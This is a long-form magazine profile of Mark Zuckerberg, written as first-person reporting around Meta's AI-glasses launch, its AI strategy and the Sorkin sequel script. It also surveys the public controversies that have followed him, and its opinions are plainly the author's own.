This one began earlier in the year, with two jury rulings that Meta apps had knowingly or negligently harmed young users. There were thousands of related pending cases, including one in which four states sought penalties potentially equivalent to the company’s entire market cap for allegedly addicting and damaging the mental health of teenagers. (In August, Meta settled with 51 jurisdictions for up to $17.1 billion, admitting no wrongdoing.) Then came a security meltdown, when hackers gained access to high-profile Instagram accounts by getting Meta’s AI customer-support bot to hand over control. Shortly after, Meta suspended its program of recording employees’ keystrokes to train its AI after it sprang a leak and made workers’ private conversations and personal data internally visible. By the time the plane lands, Zuckerberg is being raked in the press again after yet another leak: He’d quietly ordered up a prototype of a prediction markets app (albeit with play money, to start), so that his mentally damaged users can get into gambling, too.

The man is singular, I thought to myself on the ride into Manhattan, there is no getting around it. Who else can build “literal” concentration camps out of employees reassigned to data labeling? Who else manages to embody the vice of online betting the same week Polymarket is celebrated for running a dull, corporate World Cup ad featuring Rick Rubin and beautiful Senegalese models? Who else can take an entire species clearly not meant to be on the internet in the first place and personally nuke its psychiatric equilibrium? It’s incredible. He is Princeps . He is The One.

It is, in any case, a disagreeable backdrop to the Hey Meta: AI Glasses Showcase, an invite-only launch event at the Terminal Warehouse on the Hudson River, where the Tunnel nightclub used to be. I’m told there will be many models and influencers in attendance. There will be an interview with Zuckerberg, and “immersive product experiences curated by prominent contemporary artists.” There will be a party DJed by Peggy Gou, and an appearance by Kylie Jenner, whose line of Meta AI sunglasses will be debuted.

At 5pm I have an hour until the event and consider downloading Facebook again, which I should probably do at some point before interviewing Zuckerberg, but put it off. I lie down on the comfy hotel bed and put on the Olympic Studios take of “Bold as Love,” wolf down a complimentary banana and bag of cashews, and play the drums on my belly.

Outside the Terminal Warehouse it is starting to drizzle through fading sunlight as I stand in line with several people who look dressed for the Kentucky Derby. One man in a bowler hat keeps adjusting a large diamond-studded brooch in the shape of a gecko on his shirt as if he is trying to catch the light and shine it in my eyes. There is a disturbing aspect to the flesh and blood of people who live in Instagram, I think. The skin on their face is wet and their eyes don’t focus correctly, their proportions are irregular. Eventually my credentials are logged into a tablet by a woman who fastens a bracelet to my wrist and welcomes me inside.

To enter the room where Zuckerberg will be interviewed, I make my way past a row of five very tall men dressed in black and holding silver platters of bottled water. In the interview room are three columns of chairs of three rows each, and I take my seat at the back in the middle. While we wait for the interview to begin, the press handler I’d known from Menlo Park says hello and introduces me to a woman seated in front of me, who turns around laboriously.

“This is Vanessa Friedman, as you know chief fashion critic of The New York Times ,” she says. “Vanessa, this is Jeremy Stern from Colossus .”

We shake hands, and Friedman nods and smiles at me with the polite confusion and quiet pain of the Queen being introduced to a plumber. I immediately take a liking to her; her face conveys capability and no character flaws. She seems to know many of the influencers around us and goes back to chatting with them as I plunder the gift bag underneath my seat to try on my complimentary pair of Meta-EssilorLuxottica AI sunglasses.

I’d spent the previous months ignoring the appearance of the flagship Meta Lab store in my hometown of Los Angeles, where shoppers can sample the company’s various AI glasses and virtual reality headsets, take selfies at its hokey art installations, and yell at their poorly behaved dogs in its in-store cafe. It all seemed like another one of Zuckerberg’s directionless projectish things he periodically pursues, like making a phone, launching a cryptocurrency, or building the Metaverse. But I’d recently learned that the glasses were perhaps not as frivolous as they seemed, which is why I accepted an invitation to hear him speak about them.

It is a truism that while Zuckerberg is sovereign within his imperial court—immune to control by shareholders or his board—he does not actually hold the empire’s territory. He did only once, back when Facebook was a desktop site on the open web. But when the smartphone appeared, he lost his ground and never gained it back. The early trauma of having nearly missed the switch to mobile apps—scrambling during the 2012 IPO to rebuild Facebook and its advertising business around a platform shift he didn’t see coming or initially understand—has never left him. Although the Facebook app’s eventual conquest of mobile more or less made Apple’s App Store, the App Store in turn made Facebook. And Zuckerberg does not like being made.

As it does with every mobile app, Apple charges a toll on digital goods sold within each of Meta’s apps. It collects a tax on Meta’s core advertising product, such as when a business “boosts” a post through Instagram. Every update to Meta’s apps must pass Apple’s App Review, which has a history of being arbitrary and capricious. Apple denies other companies’ hardware products the privileged wireless access that makes its own products, like AirPods, seamless. In 2021, in what Ben Thompson describes as “one of the worst antitrust violations in the history of technology,” Apple’s App Tracking Transparency (ATT) feature—which it positioned contra Zuckerberg as a protection of user privacy—crippled the tracking machinery of every mobile ad business that depended on cross-app data except its own , costing Meta roughly $10 billion in the first year alone. (Google, which holds the same powers over its Android platform, has wielded them more sparingly than Apple, owing largely to its own advertising business model.)

Many of Zuckerberg’s ventures ever since have often been puzzling to outsiders, or else delightful to those who enjoy any sign that he’s jumped the shark as a technologist. Zuckerberg himself describes them as part of Meta’s DNA not as a mere social media service, but as a full-stack deep technology company. These ventures can also be understood, however, as attempted jailbreaks from Apple and other competitors, a determination to regain and hold his territory.

Thus over the last 15 years, Zuckerberg explored building a Facebook Phone. He tried to replace the Android home screen with Facebook Home. He launched Internet.org and its Free Basics service to deliver Facebook through carrier deals in India and other markets where Apple barely existed. He tried building Libra (renamed Diem), a cryptocurrency, to facilitate payments. He bought Oculus VR in the hope that virtual reality headsets would replace the smartphone the way smartphones replaced personal computers. Each has been, at least in part, a tunnel Zuckerberg dug to escape the prison of his competitors. To varying degrees, each collapsed.

“One of my things for the next 10 or 15 years is I just want to make sure we can build the fundamental technology that we’re going to be building social experiences on,” he told Jensen Huang at a conference in 2024, in the course of explaining his investment in building foundational AI models. “There have just been too many things that I’ve tried to build and then have just been told, ‘Nah, you can’t really build that,’ by the platform provider. At some level, I’m just like, ‘Nah. Fuck that.’”

No pasarán ! From his fetters in the meantime, Zuckerberg only achieved his species-warping goal of networking billions of human beings in real time through social media by age 30. By 32, he built the most unstoppable entertainment and advertising business in history. By 42, his products are used by one out of every 2.3 people currently breathing, more than the total number of humans that existed in 1965. Annual revenue runs well above $200 billion, and Meta’s capital expenditure this year will exceed the military budget of every country on Earth, save the U.S., China, and Russia. Facebook, Instagram, and WhatsApp each have more monthly active users than the number of living adherents to Christianity. Pity the empire held from a prison, the largest ever assembled by a man bound.

No matter. This is how it is for him; there is no stopping. He is not like the others of his vintage, who all at some point abdicate, or sell, or are overthrown, or appoint a regent to face the music instead, and recede into varying types of billionaire afterlife. It is the Portuguese model of empire: After winning half the world, you return home, dabble gentlemanly in philanthropy and physics, build your villa, and fuck the servants.

Not for him. Two hundred years of peace will not come for free; you have to do certain things. You wake up, you hit people, you pay them to hit you. Then it’s another subpoena, another lawsuit. The president whose election is your fault is calling. Witness testimony. Congressional hearing. The president whose election isn’t your fault demands you censor the opposition or else there will be new taxes, new investigations. Product review until 3am. Facebook is causing genocide in the Third World. Instagram is responsible for teen suicide. There’s another whistleblower with a book deal. Here comes another Aaron Sorkin movie. You’re behind on AI. No one respects social media or digital advertising. It isn’t rocket ships. It isn’t brain chips or cool cars. The sun still sets on too much of the map, and the map is a prison. Testify. Pay the settlement. Build “personal superintelligence.” Put it in the apps. Put it in sunglasses.

This is my impression, at any rate, as he takes the stage in the Terminal Warehouse in a pair of optical Meta AI glasses, and sits with his characteristic ramrod posture on the edge of his seat. As the conversation unfolds, I notice he must have overcome his trancelike silences and nervous sweating at some point, although he retains other eccentricities. For example, when he is facing his interlocutor, he often does so with his head swiveled 10 degrees, as if someone is tugging at the back of his collar and he is trying to pay it attention without taking his eyes off his questioner.

Prompted by the interviewer, Zuckerberg discusses the glasses. He believes they are the vindication of his bet dating back to 2014, when he acquired Oculus for $2 billion and began his work in virtual and augmented reality, a division of the company that convinced him to rename the whole thing from Facebook to Meta by 2021, and which to date has burned through approximately $90 billion. The Metaverse as such was a collapsed tunnel, but Zuckerberg is convinced that the glasses are one of the payoffs. They are “the ideal form factor” for an AI that can “see what you see, hear what you hear, talk to you throughout the day,” and also overlay information on the world and conduct “agentic live sessions” from ambient context. For example, he says, he recently wore them while baking with his daughter and the glasses, without being asked, told him he was botching the recipe.

The frames of the standard pair, he explains, have a capture camera in the front frame and speakers in each arm above and in front of the wearer’s ear canal, where audio can be piped in at high volume while remaining near-silent to the outside world. There are two microphones in each arm and one seated near the nose pads, closest to the wearer’s mouth, where the clarity of the audio it picks up is so high that you can, he offers, take business calls on a jet ski. The churched-up Display model also has a screen embedded in the right lens, which serves as a tiny projector within the glass, bending light into one eye only, so that the user can choose whether to glance at text messages, directions, or real-time translation captions. The miniaturized light engine and geometric waveguide within the frame connect via Bluetooth to the smartphone in your pocket, from which the Meta AI app relays the agentic intelligence.

Zuckerberg mentions the importance of “empowering” individuals six times in the 45-minute interview, which you can tell he really believes—AI glasses really will give people superhuman vision, hearing, memory, and cognition, he deems—without appearing to anticipate or perhaps care that they will of course soon come to be known among skeptics as “pervert glasses,” and associated, like Facebook and Instagram before them, with empowering individuals to commit random acts of harassment. Although the interview continues on through various buzzword questions about taste, instinct, superintelligence, and unemployment, Zuckerberg does make the central point he came here to proselytize.

“You kind of have this trajectory over time,” he explains, “where computing gets to be more natural and more integrated in our lives. And glasses just give you the opportunity to interact with technology but remain present with the people around you, which I think is a really fundamentally important thing that obviously phones don’t do . When you interact with your phone, you’re kind of interacting with this small rectangle. It pulls you away from the world around you. [But] you want to have technology be able to effectively fully integrate with the world around you.”

It is a brilliant if puckish bit of logic. That glowing rectangle you spend your life craning at in vacant prayer? Perhaps that is what’s making you and your children anxious and depressed, he seems to be suggesting. Maybe that is why you no longer have sex or sleep soundly, and can’t finish a movie or read a whole book anymore. Your prison is not my apps; it is your phone, which is my prison, too. It is time we relearn to live without it, together. It won’t go anywhere; it’ll just stay in your pocket, or perhaps at home, where you can leave behind the harm it’s done. Every positive good it provides will live instead in your EssilorLuxottica glasses, which unlike handheld LED heroin rectangles are beautiful and cool, like Kylie Jenner. Besides, he says, they are “great glasses first… the technology is secondary. The fashion and the wearing of it is actually primary.” “There are almost two billion people in the world who wear optical glasses already,” he notes, “and billions more wear sunglasses.”

The interview fittingly concludes with a question about why Zuckerberg, the planet’s sixth richest person, doesn’t just stop. “That is something Priscilla asks me a lot, especially when stuff is hard,” he says, but that he isn’t wired to stop. He illustrates the point rather nicely by digressing somewhat unprovoked into an exposition of cattle genetics, which he’s studied in service of husbanding high-quality beef on his ranch in Hawaii, where he is harvesting macadamia trees and roasting nuts for the cows’ caloric density and brewing beer to induce their appetite. “I’m never going to stop,” he says, by way of getting back to the question. “I can get obsessive.”

The next day, the press handler who’s been shepherding me asks where I’d gone after the interview finished at the Terminal Warehouse; she couldn’t find me when Zuckerberg materialized again later in the evening with Kylie Jenner and Timothée Chalamet, and speeches were given that it should not have been physically possible for me to have missed, but of which I had no memory. I think I got lost in something called the Cherry Galaxy Room, I tell her, where I’d lost track of time asking my complimentary AI glasses to explain this immersive product experience curated by prominent contemporary artists, and for icebreakers to use on Vanessa Friedman, who I never saw again.

Back in Menlo Park , Zuckerberg’s obsessiveness is on display again in a conference room, where I’m shown a number of AI products and other gestating things. These include the Display model of the glasses, which I use to send a WhatsApp message and order Starbucks while a woman from the company’s Wearables division gets down on both knees and speaks to me in Japanese, which the glasses translate via the live captions feature. There is also Muse (it was then codenamed Hatch), a personal AI agent that can connect to your apps, email, security cameras, and other devices, and do things while you’re asleep or otherwise occupied, like fill out paperwork, resolve conflicts on your calendar, remind your son to take out the trash, or get your spouse an anniversary gift. I’m also shown some other things I’m forbidden to write about, though they strike me as impressive and cool. I try to imagine Zuckerberg pulling them out of an envelope or his coin pocket on a stage to fawning gasps and rapturous applause.

No matter how such products turn out, it isn’t an easy thing to picture. Part of it is that, unlike Steve Jobs, he doesn’t have the magic. The other part, according to Zuckerberg’s loud and persistent detractors, is that it’s been 20 years since he actually invented a good product. In their telling, everything since Facebook has either flopped or, if it worked, was merely copied or bought. There has been no burst of genius like the iPhone, no masterpiece of modern art like tweezing a rocket from the sky with giant metal chopsticks. With Zuckerberg, there is no flair. Which helps to explain why every few years, despite the plodding survival and expansion of his empire, Zuckerberg is pronounced dead.

There was the mobile crisis following the IPO in 2012, when Facebook was declared an overvalued website whose audience had moved to a platform it couldn’t monetize, and Zuckerberg was considered “in over his hoodie,” too immature to run a public company. There was the mass exodus of teens to Tumblr and then Snapchat between 2013–2017, leaving Facebook to die as “the next MySpace” after Snapchat rejected a $3 billion acquisition offer, and after Zuckerberg was mocked as overpaying in a panic for Instagram and WhatsApp. There was the political crisis of 2017–2020, when Facebook “broke democracy,” the Federal Trade Commission (FTC) sued it for allegedly maintaining an illegal monopoly, and the company suffered what was then the biggest one-day loss—$120 billion—in market history. Then there was the most recent period, between 2022–2025: Users decamped for the algorithmically superior TikTok, Apple’s ATT threatened to obliterate Meta’s mobile ad business, Zuckerberg lit tens of billions of dollars on fire in pursuit of the Metaverse, and promised to do the same on an even bigger scale with AI.

Yet after every period, Zuckerberg somehow managed not only to survive, but to emerge with his position strengthened, having conquered more than he’d previously held. By the end of 2013, he’d built one of the two most profitable mobile ad businesses in the world. By the end of 2017, he’d crushed Snapchat by copying its killer innovation with Instagram Stories. By the end of 2020, the widely predicted death of Facebook was revealed as a fantasy, as the number of daily active users had only grown during each quarter of political scandal, advertisers never left, and Facebook paid the FTC a $5 billion privacy settlement. By the end of 2025, he’d survived the TikTok threat by cloning it with Reels, circumvented Apple’s ATT by rebuilding ad targeting with large AI models, beat the FTC’s attempt to break up the company (which the agency has appealed), and saved cash by weathering mass layoffs. When Meta hit a record market cap of nearly $2 trillion, he’d done it while refusing investor demands to cut spending on his Reality Labs division, where the Metaverse lived.

The serial underestimation of Zuckerberg as too vulnerable, derivative, or incompetent; of the durability of his core constituencies and sources of advantage; of the undislodgable nature of his personal power; of his grinding unsentimentality about the past; of his desperation to survive; and of his attritional willingness to absorb ridicule and retaliation, is not only an equally apt description of his Roman spirit animal. It is also, perhaps, a better way to understand his attempts to win AI.

ILLUSTRATION BY JR DUENNWELLER

Now that he’s behind Anthropic and OpenAI , it is easy to forget that prior to 2024, Zuckerberg had been hovering around the frontier of AI for over a decade. Dating back to 2006, Facebook had been a leader in machine learning, which it used to power its News Feed, targeted ads, and face recognition. By 2013, after trying and failing to acquire DeepMind (which Google bought instead), Zuckerberg recruited the future Turing laureate and legendary AI researcher Yann LeCun to start Facebook AI Research (FAIR), which over the next 11 years became one of the top corporate research labs in the world. Among other things, FAIR produced influential work in computer vision, speech, and self-supervised learning, as well as PyTorch, one of the principal deep learning frameworks used to build modern AI.

By 2024, Meta’s Llama 3.1 model performed about as well as the latest models from OpenAI, Anthropic, and Google; unlike its competitors, Llama was “open-weight” (meaning the underlying files were free for the world to download and modify). By March 2025, Llama had been downloaded over a billion times, creating a massive developer ecosystem. For that precious, fleeting moment, Zuckerberg had seemed to create something more valuable than a chatbot: the Linux of AI, as he put it in a manifesto, the underlying platform on which everyone else would build, and which he, crucially, controlled. It was looking like a tunnel that could hold.

Then it seemed, to Zuckerberg at least, to collapse. The release of Llama 4 in April 2025 was met with great mockery as an overhyped and underperforming model that simply gamed the various benchmarks used to grade a model’s capabilities, which obscured some of the real technical advances it had made. Given the manic-depressive nature of these things—every major AI lab but one is “behind” the frontier at all times, and which lab is “winning” changes every three-to-six months—the release of Llama 4 was more of a large but reversible setback than some sort of catastrophic event. If Zuckerberg had taken it on the chin and pursued Llama 5, it is unlikely that users, investors, or employees would have revolted.

The problem was that by 2025, it had become clear to Zuckerberg that in AI, there are compounding advantages to having a track record of winning in the past, meaning that “not currently winning” is in fact, in any particular quarter, a potentially irreversible catastrophe. Among other reasons, AI labs use their most recent model to train the next one, and Zuckerberg’s latest model wasn’t good enough. What’s more, FAIR had been only one of a number of major divisions within the company for the previous 12 years, including while Zuckerberg was occupied with the Metaverse. Yet it seemed clear to him by now that AI was not just one of many potential tunnels; it was an event horizon which, if he missed it the way he nearly missed the switch to mobile and the threat from TikTok, might cause his empire to slowly, if very slowly, go to nothingness.

Thus in his first board meeting after the release of Llama 4, he announced a plan of regime change. The 11 weeks that followed demonstrated the sheer power of his position as the undeposable head of a galactically resource-rich empire. He subsumed FAIR into a new organization, Meta Superintelligence Labs (MSL), and reset the market on compensation for top AI recruits to hundreds of millions or billions of dollars per head. He paid $14.3 billion for a stake in Scale AI and installed its founder, Alexandr Wang, as Meta’s head of AI. He recruited ChatGPT co-creator Shengjia Zhao, former GitHub chief Nat Friedman, Safe Superintelligence co-founder Daniel Gross, and picked off dozens of other defectors from OpenAI, Anthropic, and Google DeepMind. He cut hundreds of employees from the older organizations, and LeCun soon left. Within one quarter, MSL was up and running.

Less than three months after the release of Llama 4, in other words, Zuckerberg had dumped the previous decade-plus of his AI people and strategy, recruited new leadership, new chief scientists, and new core researchers, and announced a new capital expenditure of hundreds of billions of dollars. By April 2026, MSL released its first closed-weight model, Muse Spark, and deployed it through Facebook, Instagram, WhatsApp, and the Meta AI app, which powers the glasses. It was greeted as the cautious return of Zuckerberg to AI, but not yet to the frontier.

By the time I received the demos in June, there was already a surfeit of predictions that all this would at last— finally! —be the end of him. It was typical of his arrogance to think he could simply copy the real AI labs, just as it was his habit to try and buy his way to victory. He doesn’t understand that AI research is not like social media or product development; it is science, which is to say bottom-up, and he will fail like he did with FAIR in his attempts to micromanage his subordinates into reaching the frontier, or to use money, pressure, and punishing timetables to solve research problems he doesn’t have the wherewithal to solve. He doesn’t understand that his subordinates are not able to prevent him from making bad decisions, and given how few training runs even Meta can afford, one wrong decision is all it takes to fall behind the frontier for good. He doesn’t understand that AI will not commoditize, and that because Meta has never had the best model, it therefore never will. He doesn’t understand that AI will commoditize, and therefore will be like the First World War, in which he will expend untold treasure and blood without ever gaining an advantage. Heads, his rivals win; tails, he loses.

From this vantagepoint, it doesn’t matter that since June, Muse Spark has overtaken Google’s Gemini, vaulting Meta back to the frontier pack. It matters little that Muse, now released, was received somewhat ecstatically as perhaps the best consumer AI agent on the market, or that expectations are increasingly giddy for Watermelon, the forthcoming model. It doesn’t matter that Zuckerberg is taking on billions in new debt and spending up to $145 billion this year, including on four data centers of a gigawatt or more, one of which is planned to scale to five. It matters even less that he positioned Meta in a recent manifesto, “The Future Is For Everyone,” as more open, optimistic, and empowering of ordinary people than its relentlessly apocalyptic competitors. He’s either placed the wrong bet, and is reliving the Metaverse; or he is too late, and he’s already lost.

Unsure of my own ability to evaluate such things, I leave Meta HQ and spend another few days in Palo Alto and San Francisco ahead of my interview with Zuckerberg, seeking out a number of MSL’s competitors and investors who agree to speak to me on background. Many of them take pleasure in what they describe as the organizational “mess” of MSL, in the people there allegedly being motivated more by money than by true belief, and in Zuckerberg as a maker of boredom-relief apps and targeted advertising, not of godlike intelligence or the singularity.

I’m inclined toward sympathy with much of what they say, though I am also irritated and want to shove them in a locker. While I am not the first to chafe at their combination of messianism, contempt for ordinary consumers, and denial that they, too, are rapacious capitalists, I am apparently the first to ask them to steelman the outcome in which Zuckerberg, in light of his long history, survives and expands. Which turns out to be simple:

AI is not, in fact, God. Instead, it does math and solves a limited set of problems humans face, and is otherwise simply useful and cool. Anthropic, and to a lesser extent OpenAI, have trouble ever accepting this fact. Zuckerberg does not. He has not spent a decade comparing his company to the Manhattan Project, and thus he is not above pushing the frontier of AI to help people book airline tickets, make dinner reservations, and edit photos. He will use it to drive down the cost of serving his users to zero, and to drive up his revenue by improving ads. He will use cash from the ad business—and his ownership of data centers, chips, and other infrastructure that Anthropic and OpenAI have to pay to rent—to undercut them on price. The potential install base for his AI is 3.6 billion people, who don’t care whether a given model is six months behind the frontier.

If AI commoditizes, then Anthropic and OpenAI go to zero, and value accrues instead at the complements Meta already dominates, like distribution, attention, personalization, and commerce. If it doesn’t commoditize, then at least he is not his competitors’ prisoner the way he’s been with Apple, and all he has to do is remain within six months of the frontier, which he’s already close to. Heads, he wins; tails, he wins.

Do you think there’s a chance that this is what happens? I ask. “Yes,” is how I’d paraphrase their answers. Do you think this is his wager? “Probably.” Would you be willing to bet that he fails? “Probably not.” When do you think we’ll know which way it breaks? Very gradually, then all at once.

“I’ll be honest, I used to work [at Meta],” a researcher at a competing lab tells me. “They have lots of problems, and there are so, so many ways it could go haywire. But Mark is the fucking Terminator. He’s actually not an asshole, which is interesting. He’s not a miserable fuck. But his source of advantage is he’s never happy. He just doesn’t fucking stop.”

“The world thinks that people out here [in tech and AI] are pretty soy or whatever. But you actually have to be pretty fucking tough and aggressive, just in a classic masculine sort of way,” he says. “And Mark’s still the alpha of that. I am not hoping they get to a place where we compete with him.”

The doorbell rings at my home in Los Angeles, where I await the call to return to Palo Alto; after the summer’s spell of bad press, my interview with Zuckerberg’s been rescheduled. I open the door to find Zhenya, who never lets you know when to expect him. He kisses me on both cheeks, declines to join me for a drink, hands me my package, and leaves.

When I lived in St. Petersburg in 2009, I became close friends with Zhenya, who is probably lying when he claims to be under six-foot-eight (and whose name I’ve changed in deference to his paranoia). A dozen years later, he left Russia to avoid military conscription and reinvented himself in Los Angeles as a sort of Hollywood fixer, which at the time I took as some sort of joke. But Zhenya has exceeded every favor I’ve since asked of him, of which there have only been three. Once I asked for a ticket to the premiere of Barbie and received two. Once I asked for Carmelo Anthony’s email and received his phone number. And once, in June, I asked if he could get me into an early cut of The Social Reckoning , Aaron Sorkin’s second movie about Zuckerberg, which doesn’t appear in theaters until October.

Zhenya couldn’t get me into an early screening, he said, but he could get his hands on the script. If I wanted to read it, however, I’d have to do so in person, then hand it back to him to shred. It was typical of my American naivete, he said, when I insisted that Zuckerberg does not in fact control every encrypted messaging service in the world, and he could therefore just text me the PDF. But there is no arguing with Zhenya’s paranoia or testing the limits of his generosity. Thus I returned to my kitchen to read the script and rewatch The Social Network , Sorkin’s first movie about Zuckerberg.

When it came out in 2010, everyone at Facebook rented a theater to watch it together with Zuckerberg, who was overwhelmed and afraid. He was 26 years old, and the creators of The West Wing and Se7en had teamed up to make a movie about him scored by Nine Inch Nails and based on a book which told the story of Facebook’s founding from the perspective of Eduardo Saverin, its most aggrieved co-founder, who was squeezed out in 2005. What was worse, the reviews were really good.

Although the film inspired a generation of undergraduates to drop out and join or start tech companies, Zuckerberg still refers to The Social Network as “that stupid movie.” While a certain amount of artistic license was expected, he feels, certain sins were unforgivable. The movie’s central conceit is that Zuckerberg started Facebook not because he “loves building things,” but out of class resentment, social exclusion, and romantic rejection. The film is bookended by Erica Albright, the girl who dumps him and won’t take him back; in between, he is spurned by the Harvard WASP clubs he tries to join. Thus he must start Facebook in order to get in with, or back at, her and them.

In real life, there was no Erica Albright; by the time Zuckerberg started Facebook in 2004, he was already dating Priscilla Chan, whom he married. In reality, he wasn’t rejected by the WASPs because he never tried to join one of their social clubs; he was a popular, beer-guzzling member of Alpha Epsilon Pi, the Jewish fraternity. According to the available evidence, he and his co-founders built Facebook because he was in the habit of serially building new websites and social networks, and clearly had no idea where this one was going.

In a 2010 interview with New York magazine, Sorkin acknowledged that his loyalty was to storytelling rather than facts. Sixteen years later, however, the movie reads as a keenly aware and prophetic bit of projection. The class resentment that pervades the film is not Zuckerberg’s but Sorkin’s, who seemed brilliantly to understand even as early as 2010 that social media was in the beginning stages of annihilating the traditional media on which his career is built, and which therefore must have been motivated by a venal loser. The Social Network survives not only as an excellent piece of fiction, but as the ultimate collision of the theater kid and the tech bro at a hinge moment in American cultural history: the former taking revenge on the latter’s newfound wealth and power by forever ascribing to it, in the minds of the public, the root motive of social and sexual humiliation.

The Social Network survives not only as an excellent piece of fiction, but as the ultimate collision of the theater kid and the tech bro at a hinge moment in American cultural history.

The reason that Zuckerberg has never been able to live the movie down is because it was only the beginning of a long slide into true popular ignominy. The same year the film came out, he had his “Nixon moment” during an on-stage interview with Kara Swisher, in which Zuckerberg—who was prone to public speaking-induced anxiety—sweated through his hoodie and was incoherent. By 2011, Facebook was first credited for the Arab Spring, then blamed for its violent suppression. In 2012, Republicans complained that Facebook aided the reelection of Barack Obama, whose campaign bragged openly about its deft use of the platform’s targeted advertising.

In 2016, after the election of Donald Trump, the nascent civil war between the Democratic Party’s three major factions—the Obama administration, the Clinton campaign, and The New York Times —was resolved by mutual agreement to scapegoat not Obama for creating Trump, nor Clinton for running an entitled and uncharismatic campaign, nor the Times for breathlessly covering Clinton’s email controversy, but Zuckerberg, for allowing “disinformation” and “Russian interference” to brainwash voters. As if such horrors hadn’t previously been possible, and as if no other communications system could have been used instead if Facebook and WhatsApp hadn’t existed, he was duly accused after 2016 of failing to prevent his apps from being used to foment genocides, ethnic cleansings, and sectarian riots in India, Sri Lanka, Myanmar, Ethiopia, and Kenya.

In 2020, Republicans blamed “Zuckerbucks” ($400 million in donations made by Zuckerberg and Chan to election administrators to assist pandemic-era voting) for the election of Joe Biden. In 2021, Biden accused Facebook of “killing people” by insisting on the First Amendment rights of vaccine-skeptical users (which he later retracted), while White House officials publicly threatened antitrust suits and Section 230 reform if Zuckerberg did not comply with demands to censor several other categories of pandemic and election-related “misinformation,” including humor and satire (which they did not retract). After Zuckerberg finally caved to a number of the Biden administration’s censorship demands, he was blamed by Republicans for suppressing information about the vaccine and the lab leak theory of COVID-19, and for keeping Trump out of power. After Trump’s reelection in 2024 made nonsense of the claim from eight years earlier that a man like that could never have won without Facebook-facilitated “lies,” Meta fought, lost, and settled a bipartisan wave of suits charging it with deliberate harm to teenage users, culminating in last month’s $17 billion settlement.

Perhaps the apogee of Zuckerberg Derangement Syndrome was the Cambridge Analytica scandal, still remembered by millions of people as perhaps the founding crime of the digital era. The story went that a knowing or at least negligent Zuckerberg allowed a British political consulting firm to “harvest” the private data of 87 million unwitting Facebook users and feed it into a psychographic tool that was used to brainwash Americans into electing Trump and Britons into voting for Brexit. The story resulted in two days of Congressional hearings, over a year of nonstop news coverage, the $5 billion FTC fine, and a Netflix documentary, despite the fact that it was almost entirely bullshit.

In reality, a Cambridge academic called Aleksandr Kogan had gathered data through a personality quiz taken by fewer than 300,000 Facebook users via the same Application Programming Interface (API) which the Obama campaign used in 2012, and which was an open feature on the platform for years. By handing the data over to Cambridge Analytica, Kogan had violated Facebook’s terms. But the data itself was mainly dross, consisting of names, birthdays, current cities, and page likes, which together produced a “psychographic weapon” that ended up predicting voter behavior more poorly than the Republican National Committee’s voter file. The definitive investigation into the scandal—the largest ever undertaken by a data-protection authority—was concluded in October 2020 by the British government’s Information Commissioner’s Office (ICO), which raided Cambridge Analytica’s offices and examined its servers. Its report concluded that the firm’s data had been mostly commercially available and primarily used by the consulting firm as a fabulist marketing device. Regardless, the ICO concluded, the data had not actually been used in the Brexit referendum. At that point—one month before the 2020 US election—the scandal gradually disappeared from the American news media, too.

None of which is to say that Zuckerberg has not committed his own unforgivable sins over the last two decades. Early on, he took information users designated as private and made it public without warning or consent; shared user data with advertisers after claiming he didn’t; and granted corporate partners access to data he claimed they couldn’t see. The youthful glee he took in Facebook’s systematic destruction of the business models of legacy news media and other information gatekeepers showed little appreciation for the consequences of such a dramatic social revolution. Facebook likewise did enter markets, like Myanmar, where both users and the company were completely unprepared to handle the newfound political power of social media.

A younger Zuckerberg demeaned himself, moreover, when he tried for years to break back into the Chinese market after being shut out in 2009, including by staging a copy of Xi Jinping’s book on his desk, having himself photographed jogging through Tiananmen Square, and reportedly asking the Chinese president to name his unborn child (which Facebook denied). Under pressure from radicalized employees and government officials after 2016, he made a political sacrifice out of Oculus founder Palmer Luckey, and for a time betrayed his own foundational commitment to free speech. Much of the content on Facebook and Instagram really is addictive slop, and Zuckerberg can often display a frustrating refusal to acknowledge that the time a user spends on social media is not by definition a reflection of the “value” they are deriving from it.

Which in turn helps explain the August settlement. TikTok and YouTube boast more teenage users than Instagram, in fact, and Snap has far more than Facebook. Yet these platforms, which are likewise awash in addictive slop, face a fraction of the litigation claiming harm to children. If Zuckerberg wanted to use regulatory capture to lock his competitors out of their core demographic while consolidating a hold over his own, he could presumably lobby the government and publicly favor a nationwide ban across all social media of under-18 users, who in any case are less valuable to Meta’s ad machine than to its competitors. Yet such a canny business decision would require him to concede the one point we all demand from him, but which in his veins he does not believe is true: that social media is bad for children. Thus he refuses, and concludes the settlement. Thus are the sacrifices he makes on the altar of an authority higher than his own, but which appease no mortals.

And thus the more salient question about Zuckerberg than his obvious defects, which is why he alone has managed to remain the most persistent scapegoat of the 21st century. Most children, after all, are on other people’s social media apps. Meta is not exactly alone in its collection and use of rivers of data (which is what computers are designed to spew), and it is hardly shy about the fact that Facebook and Instagram are platforms for sharing information in public. During periods of government pressure to suppress speech, Zuckerberg held out far longer than Twitter and Google. Apple and Tesla actually comply with and profit from the Chinese Communist dictates that Facebook only explored a willingness to accept. Everyone knows that lies, envy, and mass murder existed and proliferated throughout humanity before Mark Zuckerberg, just as they existed before the internet, television, radio, the telegraph, and the postal system.

Yet perhaps it is that simple, intolerable fact—that new technologies are always being invented; what remains broken is us —which requires a scapegoat. And who could ask for a better one than him? He is, for millions of people, a hideous mirror of both modern technological capitalism, and the resistance of history and human nature to perfectibility by it. He is seen at once as shrewd and naive, calculating and lucky, too powerful and too craven. Unlike the Boomers and Gen X, he is the only trillion-dollar founder of his generation, and Millennials are cringe. He is Jewish and uncool, yet impervious to humiliation. He is, in one man, the personification of responsibility for alt-right populism; leftwing authoritarianism; the death of journalism; polarization; political propaganda; political censorship; the dangers of free speech; human rights violations; teenage depression; body dysmorphia; and male loneliness. He is an emperor for life. He is, in a word, an easy mark.

In the script of The Social Reckoning (potential spoilers ahead), Sorkin again bookends the film with an invented female character. In reality, the whistleblower behind Sorkin’s source material—Frances Haugen—had a friend who was radicalized by conspiracy theories on “online forums,” which motivated Haugen to take a role policing “misinformation” on social media, which led her to a job at Facebook. In the film, however, the friend is a progressive woman radicalized by Facebook, an injustice which Haugen—already employed there—must bring to light. In the opening scene, the friend is drunk on a highway and hurls racist insults at two police officers who pull over to check on her, which she records on her phone for clicks. During the course of the movie, we learn that Zuckerberg personally manipulated Facebook’s algorithms to bait progressives like her with racist outrage content, because it’s good for business.

In the climactic scene—perhaps the choicest in all of Sorkinalia—we meet her again. She is trampling a Black police officer at the Capitol on January 6, 2021.

ILLUSTRATION BY JR DUENNWELLER

